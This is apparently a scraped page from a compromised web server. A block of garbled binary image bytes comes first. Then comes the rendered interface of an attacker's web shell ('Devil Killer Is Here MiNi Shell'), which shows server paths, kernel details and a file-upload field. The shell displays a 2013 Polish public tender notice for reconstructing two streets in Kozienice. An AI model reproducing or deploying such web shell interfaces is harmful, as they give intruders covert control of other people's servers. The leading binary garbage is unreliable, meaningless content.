JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130213/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130213/59612-N-2013.html

<p class="kh_header"><b>Kozienice: Przebudowa ulic Armii Ludowej i Kościuszki do ulicy Radomskiej w Kozienicach</b><br>
<b>Numer ogłoszenia: 59612 - 2013; data zamieszczenia: 13.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulic Armii Ludowej i Kościuszki do ulicy Radomskiej w Kozienicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa ulicy Armii Ludowej i ulicy Kościuszki na odcinku od ulicy Armii Ludowej do ul. Radomskiej w Kozienicach o łącznej długości 500,7m, obejmująca przebudowę nawierzchni jezdni, zatok postojowych dla samochodów osobowych, zatoki postojowej dla autobusów, chodników, zjazdów, odwodnienia, zieleni, zmianę organizacji ruchu, przebudowę linii kablowej oświetlenia ulicznego 
i linii napowietrznej niskiego napięcia - usunięcie kolizji z projektowaną drogą.
Zadanie będzie realizowane w oparciu o projekt budowlano-wykonawczy przebudowy ulicy Armii Ludowej 
w Kozienicach, przebudowy ulicy Kościuszki w Kozienicach (odcinek od ulicy Armii Ludowej do ulicy Radomskiej) - branża drogowa, projekt budowlano-wykonawczy usunięcia kolizji z projektowaną drogą - branża elektryczna, projekt stałej organizacji ruchu ( ul. Armii Ludowej, ul. Kościuszki), zgodnie z zasadami wiedzy technicznej i sztuki budowlanej z uwzględnieniem wymagań określonych w szczegółowych specyfikacjach technicznych wykonania i odbioru robót oraz z zachowaniem warunków określonych w SIWZ.    
Zakres robót:
1.Roboty drogowe, w tym:
1.1. Roboty przygotowawcze i ziemne:
a)  roboty pomiarowe,
b)  roboty rozbiórkowe w tym:
rozbiórka istniejącej podbudowy z płyt betonowych drobnowymiarowych i nawierzchni bitumicznej jezdni i zatok postojowych,
 rozbiórka krawężników betonowych 30x20cm wraz ławą betonową na całej długości ulic, przestawienie krawężników betonowych 15x30cm,
rozbiórka nawierzchni zjazdów z płyt betonowych lub kostki betonowej,
rozbiórka ciągów pieszych z płyt betonowych lub kostki betonowej,
rozbiórka obrzeży betonowych,
przełożenie nawierzchni chodników, zjazdów oraz nawierzchni ul. Pustej
c) roboty ziemne - wykonanie koryta pod warstwy konstrukcyjne nawierzchni jezdni, na poszerzeniach, zatokach postojowych i zatoce autobusowej oraz na zjazdach i ciągach pieszych, wykopy, zasypywanie wykopów, zagęszczenie nasypów, regulacja korony ulicy.
Wywóz i utylizacja wszystkich materiałów pochodzących z rozbiórki w zakresie i na koszt Wykonawcy.
1.2. Krawężniki
 wbudowanie krawężników betonowych 30x15cm na podsypce cementowo-piaskowej,
 wbudowanie krawężników wtopionych 25x10cm na podsypce cementowo-piaskowej,
wykonanie ławy betonowej z oporem z betonu B-15
1.3 Jezdnia:
Konstrukcja nowej nawierzchni ulic dla kategorii KR2 z uwzględnieniem mieszanki mineralno-bitumicznej dla kategorii ruchu KR3
a)konstrukcja jezdni:
warstwa ścieralna nawierzchni z betonu asfaltowego 0 12,8 grubości 5 cm,
 warstwa wiążąca nawierzchni z betonu asfaltowego 0 16 grubości min.7 cm,
 górna warstwa podbudowy z kruszywa łamanego 0-31,5mm gr. 8 cm,
 dolna warstwa podbudowy z kruszywa łamanego 0-63mm gr. 15 cm,
 warstwa odsączająca z piasku gr. 10 cm,
b) konstrukcja nawierzchni w miejscu powierzchni wyniesionej na skrzyżowaniu ulicy Armii Ludowej z ulicą Kościuszki i w miejscach projektowanych progów zwalniających i progów typu poduszka:
nawierzchnia z kostki betonowej koloru żółtego gr. 8 cm na podsypce cementowo-piaskowej gr. 4 cm,
 górna warstwa podbudowy z kruszywa łamanego 0-31,5mm gr. 8 cm,
 dolna warstwa podbudowy z kruszywa łamanego 0-63mm gr. 15 cm,
 warstwa odsączająca z piasku gr. 10 cm. 
Przy włączeniu ulicy Pustej i zajazdów do bloków Nr 1 i Nr 3 istniejącą nawierzchnię z kostki betonowej należy przełożyć do nowych, projektowanych rzędnych ulic Armii Ludowej i Kościuszki.
Nawierzchnia jezdni ograniczona krawężnikiem betonowym 30x15cm posadowionym na ławie betonowej z oporem z betonu B-15, a na wysokości zatok postojowych krawężnikiem 25x10cm wtopionym.
1.4. Zatoki postojowe i zjazdy
Stanowiska postojowe prostopadłe do jezdni;
Stanowiska postojowe wyznaczone trwale za pomocą linii ułożonych z kostki betonowej kolorowej czerwonej lub żółtej. 
a)	konstrukcja zatok postojowych i zjazdów:
 nawierzchnia z kostki betonowej koloru szarego dla zatok, koloru grafitowego dla zjazdów gr. 8 cm na podsypce cementowo-piaskowej gr. 4 cm,
podbudowa z kruszywa łamanego 0-31,5mm gr. 15 cm,
 warstwa odsączająca z piasku gr. 10 cm
b) ograniczenie nawierzchni zatok:
od strony jezdni - krawężnikiem betonowym 25x10cm na ławie betonowej z oporem z betonu B-15, wtopionym,
	od strony chodnika - krawężnikiem betonowym 30x15cm na ławie betonowej z oporem z betonu B-15
        wystającym,
c) ograniczenie nawierzchni zjazdów:
	od strony jezdni  - krawężnikiem betonowym 25x10cm na ławie betonowej z oporem z betonu B-15,
        wtopionym
	 od strony chodników - obrzeżem betonowym 30x8cm na podsypce cementowo-piaskowej gr. 5 cm.
1.5. Zatoka autobusowa
a) konstrukcja zatoki:
	 nawierzchnia z kostki betonowej koloru szarego gr. 8 cm na podsypce cementowo-piaskowej gr. 4 cm,
	górna warstwa podbudowy z kruszywa łamanego 0-31,5mm gr. 8 cm,
	 dolna warstwa podbudowy z kruszywa łamanego 0-63mm gr. 15 cm,
	warstwa odsączająca z piasku gr. 10 cm.
b) ograniczenie nawierzchni zatoki autobusowej:
 od strony jezdni - krawężnikiem betonowym 25x10cm na ławie betonowej z oporem z betonu B-15-wtopionym,
 od strony chodnika - krawężnikiem betonowym 30x15cm na ławie betonowej z oporem z betonu B-15- wystającym.
       1.6. Chodniki
Konstrukcja chodnika:
 nawierzchnia z kostki betonowej kolorowej gr. 6cm (wzór zgodny z ciągami istniejącymi) na podsypce cementowo-piaskowej gr 4 cm, 
podbudowa z kruszywa łamanego 0-31,5mm gr. 10 cm,
 warstwa odsączająca z piasku gr. 10 cm.
2. Odwodnienie
       Odwodnienie ulic odbywać się będzie metodą powierzchniową do istniejącej sieć kanalizacji deszczowej.
       Zakres robót:
        wymiana wszystkich istniejących wpustów ulicznych wraz z przykanalikami, wpusty deszczowe uliczne
       żeliwne uchylne osadzone na studzienkach betonowych DN 500mm wraz z osadnikami. Kraty wpustów   ulicznych ze stalowym osadnikiem na zanieczyszczenia stałe, zamykane.
       Wpusty deszczowe osadzone na żelbetowym pierścieniu odciążającym i przykryte prefabrykowaną betonową 
       płytą,
        częściowa wymiana kręgów na istniejących studniach rewizyjnych kanalizacji deszczowej,
       dobudowa nowych studni i wpustów ulicznych wraz z przykanalikami. Kanały z rur PVC śr. 200 mm.
 istniejące i nowe studnie kanalizacji deszczowej i istniejące studnie kanalizacji sanitarnej należy przykryć płytą nastudzienną żelbetową osadzoną na pierścieniu odciążającym żelbetowym i wyposażyć we włazy żeliwne DN 600mm typu ciężkiego,
 próby szczelności
3. Przebudowa linii oświetlenia ulicznego
 przebudowa oświetlenia ulicznego w ul. Armii Ludowej,
 przebudowa linii nn-przyłącze w ulicach Nowy Świat i Armii Ludowej,
 przebudowa oświetlenia ulicznego w ul. Kościuszki.
Roboty obejmują: demontaż słupów z oprawami, demontaż kabli, zabudowę słupów i opraw, budowę linii kablowej i uziemienia powierzchniowego, przebudowę przyłącza podpartego słupem, przebudowę linii oświetleniowej napowietrznej ze słupem, pomiary izolacji, ciągłości żył kabli i przewodów niskiego napięcia oraz rezystancji uziemienia.
Słupy stalowe ocynkowane, o wysokości 8,0m montowane na fundamentach z wysięgnikami: z jednym wysięgnikiem 1,5 m i z dwoma wysięgnikami 1,5 m - od drogi, 0.8 - od chodnika Oprawy sodowe w II klasie ochronności, źródło światła o mocy 100W od drogi, 70W od chodnika. Wysokość zawieszenia opraw : 8m - od drogi, 5m - od chodnika.
UWAGA: Zdemontowane materiały Wykonawca zda protokólarnie do magazynu PGE Dystrybucja S.A. Oddział Skarzysko-Kamienna Rejon Energetyczny Kozienice, ul. Przemysłowa 11 w Kozienicach (dalej zwany RE Kozienice). W przypadku wniosku RE Kozienice Wykonawca dokona utylizacji zdemontowanych materiałów zgodnie z przepisami prawa lub dokona zwrotu do magazynu wskazanego przez RE Kozienice. Do odbioru końcowego Wykonawca przedstawi dokumenty z utylizacji źródeł światła i protokół zdawczo-odbiorczy.
Protokół zdawczo-odbiorczy zawierać będzie w szczególności:
 dokumentację powykonawczą,
protokoły odbioru technicznego,
nwentaryzację geodezyjną,
 kosztorys robót określający wartość przebudowanych sieci.
W przypadku braku możliwości technicznych przeniesienia zdemontowanych urządzeń Wykonawca odtworzy zdemontowane urządzenia w sposób uzgodniony z RE Kozienice.
Wykonawca ma obowiązek zapewnić możliwość kontynuowania przez RE Kozienice dostarczania energii przez inne urządzenia, tak by dostawy do odbiorców były kontynuowane bez zakłóceń.
W razie konieczności i potrzeby umieszczenia dodatkowych urządzeń Wykonawca zamontuje je 
w uzgodnieniu z RE Kozienice.
Całość robót wykonywać pod nadzorem pracowników RE Kozienice.
4. Zabezpieczenie istniejących sieci
 przed rozpoczęciem robót ziemnych Wykonawca dokona sprawdzenia położenia i głębokości posadowienia przewodów infrastruktury technicznej. Prace ziemne w pobliżu urządzeń infrastruktury technicznej należy wykonywać ręcznie pod nadzorem pracowników wyznaczonych przez właścicieli sieci. 
 istniejące urządzenia infrastruktury technicznej ( m.in. studnie telefoniczne, studnie dla włazów kanałowych c.o., uzbrojenie sieci gazowej i wodociągowej) należy wyregulować wysokościowo do projektowanych rzędnych,  
na istniejących przejściach poprzecznych sieci, przyłączach, sieciach kablowych należy zamontować rury osłonowe zgodnie z zaleceniami dysponentów sieci,
 w razie konieczności należy przedłużyć rury ochronne z wyprowadzeniem ich poza krawędź jezdni, zatok postojowych, chodnika.
Uwaga: W przypadku stwierdzenia w czasie przebudowy konieczności wykonania dodatkowych prac zabezpieczających istniejącą sieć gazową np. montaż lub obsadzenie skrzynek armatury gazowej do poziomu projektowanej nawierzchni, montaż lub przedłużenie rur ochronnych, obniżenie posadowienia gazociągu itp. Wykonawca zleci odpłatne wykonanie tych prac do Rejonu Dystrybucji Gazu Pionki, ul. Słowackiego 13A. Wszelkie koszty związane z zabezpieczeniem istniejącej sieci gazowej obciążają Wykonawcę. 
Zabezpieczenie przez Wykonawcę pozostałej infrastruktury technicznej zgodnie z zaleceniami dysponentów sieci. 
5. Zieleń
 ścinanie drzew, karczowanie, wywóz dłużyc i karpiny w zakresie i na koszt Wykonawcy.
 nasadzenia nowych drzewek gatunek Klon Globosa szczepionych na pniu,
 odtworzenie i wykonanie nowych trawników z rozściełaniem ziemi urodzajnej i użyciem traw odpornych na warunki miejskie z nawożeniem,
- montaż koszy ulicznych na śmieci stalowych o pojemności 35l.
6. Organizacja ruchu
a) tymczasowa na czas prowadzenia robót - Wykonawca opracuje projekt czasowej organizacji ruchu wraz 
z uzyskaniem wymaganych zezwoleń, w tym zajęcie pasa drogowego drogi gminnej oraz dokona oznakowania na czas prowadzenia robót zgodnie z przepisami. Wykonawca nie ponosi kosztów z tytułu zajęcia pasa drogowego drogi gminnej w związku z realizacją zamówienia,
b) stała organizacja ruchu zgodnie z zatwierdzonym projektem organizacji ruchu: 
  rozbiórka słupków i znaków drogowych, 
 oznakowanie pionowe -  montaż  nowych słupków, znaków i tabliczek drogowych oraz montaż wygrodzeń segmentowych i łańcuchowych. Znaki z licem z folii odblaskowej II generacji na blasze stalowej ocynkowanej z podwójnie zagiętymi krawędziami,
 oznakowanie poziome - linie segregacyjne i znaki poprzeczne. Oznakowanie poziome musi charakteryzować się dobrą widocznością w ciągu nocy, wysokim współczynnikiem odblaskowości, odpowiednią szorstkością, odpowiednim okresem trwałości, odpornością na ścieranie i zabrudzenie oraz szybką metodą aplikacji. 
W celu uspokojenia ruchu kołowego, w sąsiedztwie Publicznej Szkoły Podstawowej Nr 1, skrzyżowanie ulic należy wykonać jako powierzchnię wyniesioną na skrzyżowaniu. W ciągu ulic należy wykonać progi zwalniające oraz progi zwalniające typu poduszka zabudowane kostką betonową.
7. Dodatkowe warunki wykonawcze
Do Wykonawcy należy:
 wykonanie niezbędnych pomiarów, prób i badań w zakresie wykonywanych robót,
 geodezyjne wytyczenie obiektu w terenie, bieżąca obsługa i geodezyjna inwentaryzacja powykonawcza obiektu. Wykonawca po zakończeniu robót przekaże Zamawiającemu 5 szt. powykonawczej inwentaryzacji geodezyjnej wraz z zestawieniem ilościowym wykonanych robót (tj. powierzchni jezdni. zjazdów, chodników, zatok postojowych, długości sieci, długości przykanalików, ilości studni), przy czym Wykonawca zobowiązany jest do bieżącego sporządzenia inwentaryzacji geodezyjnej wymaganej na czas odbiorów branżowych, w szczególności dotyczących sieci i instalacji sanitarnych i elektrycznych,
wywóz i utylizacja wszelkich materiałów pochodzących z rozbiórki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 
ust. 1 pkt. 6 ustawy Pzp do wysokości 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.10.00.00-8, 45.11.12.00-0, 45.23.33.00-2, 45.23.21.30-2, 45.23.32.90-8, 45.23.30.00-9, 45.23.14.00-9, 45.31.51.00-9, 45.31.43.10-7, 31.52.72.00-8, 45.23.22.10-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia - że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał:
- co najmniej jedno zamówienie polegające na wykonaniu robót budowlanych przedmiotem których było wykonanie nawierzchni bitumicznej o powierzchni min. 2000m2 i załączy dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia - że dysponuje co najmniej:
- jedną osobą posiadającą kwalifikacje zawodowe do kierowania robotami budowlanymi tj. osobą posiadającą uprawnienia budowlane w rozumieniu przepisów ustawy z dn. 
7 lipca 1994r. Prawo Budowlane ( Dz.U. z 2006r. Nr 156, poz. 1118 ze zm.) w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,
b)	dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie
zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
c)	pisemne zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( np. wg wzoru - załącznik nr 7 lub inny równoważny dokument- patrz uwaga do punktu 8.1.2.1), jeżeli wykonawca przy wykazywaniu spełniania warunków udziału w postępowaniu, o których mowa w pkt 8.1.1.1 ilub 8.1.1.2 powołuje się na potencjał innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania następujących zmian postanowień zawartej umowy w stosunku do treści oferty:
       	1) terminu wykonania zadania w następujących przypadkach:
	a) niesprzyjających warunków pogodowych,
	b) niedopełnieniu przez Zamawiającego jego obowiązków wynikających z umowy,
                c) z powodu uzasadnionych zmian  w zakresie sposobu wykonania przedmiotu zamówienia proponowanych  
                  przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego, 
               d) z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez 
                  doświadczonego wykonawcę, robót,
               e) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki 
                  zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego   
                  bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
                                 f) z powodu stanu wyższej konieczności, powodującego podjęcie działań w celu uchylenia bezpośredniego
                                niebezpieczeństwa grożącego dobru społecznemu lub jakiemukolwiek dobru jednostki,
               g) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są 
                  konsekwencją winy którejkolwiek ze stron,
	 h) zawieszenia wykonania prac nie spowodowanych uchybieniami Wykonawcy,
wówczas strony ustalą nowe terminy realizacji, z tym ze minimalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy.
